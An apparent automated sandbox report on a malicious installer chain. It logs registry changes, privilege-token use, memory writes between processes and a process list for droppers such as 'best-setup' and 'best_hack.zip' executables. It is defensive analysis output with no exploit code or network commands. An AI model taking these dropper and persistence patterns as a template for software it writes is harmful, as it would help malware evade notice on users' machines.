Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000}\MaxCapacity = "15140" C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\njWwDHq.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Users\Admin\Documents\best_hack.zip_id23904541.exe N/A
N/A N/A C:\Users\Admin\Documents\best_hack.zip_id23904541.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jKQGazGe\aeVB0B3RszAd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBose.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBose.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBose.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SoundBose.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\fontview.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\fontview.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\best_hack.zip_id23904541.exe N/A
N/A N/A C:\Users\Admin\Documents\best_hack.zip_id23904541.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4864 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp
PID 4864 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp
PID 4864 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp
PID 1656 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1656 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1656 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1656 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp C:\Windows\SysWOW64\schtasks.exe
PID 1656 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp C:\Windows\SysWOW64\schtasks.exe
PID 1656 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp C:\Windows\SysWOW64\schtasks.exe
PID 1656 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1656 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1656 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1800 wrote to memory of 4056 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\Documents\best_hack.zip_id23904541.exe
PID 1800 wrote to memory of 4056 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\Documents\best_hack.zip_id23904541.exe
PID 1800 wrote to memory of 4056 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\Documents\best_hack.zip_id23904541.exe
PID 1800 wrote to memory of 1588 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe
PID 1800 wrote to memory of 1588 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe
PID 1800 wrote to memory of 2340 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe
PID 1800 wrote to memory of 2340 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe
PID 1800 wrote to memory of 2340 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe
PID 2340 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp
PID 2340 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp
PID 2340 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\P7m7m07B\nQgmB.exe C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp
PID 1800 wrote to memory of 1200 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe
PID 1800 wrote to memory of 1200 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe
PID 1800 wrote to memory of 1200 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\O3zFOHRS\WDi0exKakQ.exe
PID 4100 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe
PID 4100 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe
PID 4100 wrote to memory of 5108 N/A C:\Users\Admin\AppData\Local\Temp\is-8JDE0.tmp\nQgmB.tmp C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe
PID 1588 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe C:\Users\Admin\AppData\Local\Temp\SoundBose.exe
PID 1588 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe C:\Users\Admin\AppData\Local\Temp\SoundBose.exe
PID 1588 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\LETSvNnP\eVjE2GDeLpgeAMAu.exe C:\Users\Admin\AppData\Local\Temp\SoundBose.exe
PID 1800 wrote to memory of 4296 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe
PID 1800 wrote to memory of 4296 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe
PID 1800 wrote to memory of 4296 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe
PID 1800 wrote to memory of 4520 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe
PID 1800 wrote to memory of 4520 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe
PID 1800 wrote to memory of 4520 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe
PID 4296 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp
PID 4296 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp
PID 4296 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\UPJWRquH\p7pVac.exe C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp
PID 4384 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp C:\Windows\SysWOW64\schtasks.exe
PID 4384 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp C:\Windows\SysWOW64\schtasks.exe
PID 4384 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp C:\Windows\SysWOW64\schtasks.exe
PID 4384 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp C:\Program Files (x86)\ScanRename\ScanRename.exe
PID 4384 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp C:\Program Files (x86)\ScanRename\ScanRename.exe
PID 4384 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\is-2LDUN.tmp\p7pVac.tmp C:\Program Files (x86)\ScanRename\ScanRename.exe
PID 4520 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe C:\Windows\SysWOW64\forfiles.exe
PID 4520 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe C:\Windows\SysWOW64\forfiles.exe
PID 4520 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe C:\Windows\SysWOW64\forfiles.exe
PID 4520 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe C:\Windows\SysWOW64\forfiles.exe
PID 4520 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe C:\Windows\SysWOW64\forfiles.exe
PID 4520 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\stnsDyiS\9QJQIfXn4mxfx.exe C:\Windows\SysWOW64\forfiles.exe
PID 2016 wrote to memory of 3212 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2016 wrote to memory of 3212 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2016 wrote to memory of 3212 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1776 wrote to memory of 2752 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1776 wrote to memory of 2752 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1776 wrote to memory of 2752 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3212 wrote to memory of 4432 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3212 wrote to memory of 4432 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3212 wrote to memory of 4432 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2752 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2752 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe

Processes

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe

"C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe"

C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SSHVT.tmp\best-setup_FLc4rckO.tmp" /SL5="$E005E,4965743,52224,C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe"

C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe

"C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1616 -ip 1616

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 140

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Reg Organizer 6"

C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe

"C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe" ad9ff40ab2841a8973dbdb0a6dca746b

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 856

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 864

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1800 -ip 1800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1056

C:\Windows\SysWOW64\WerFault.exe

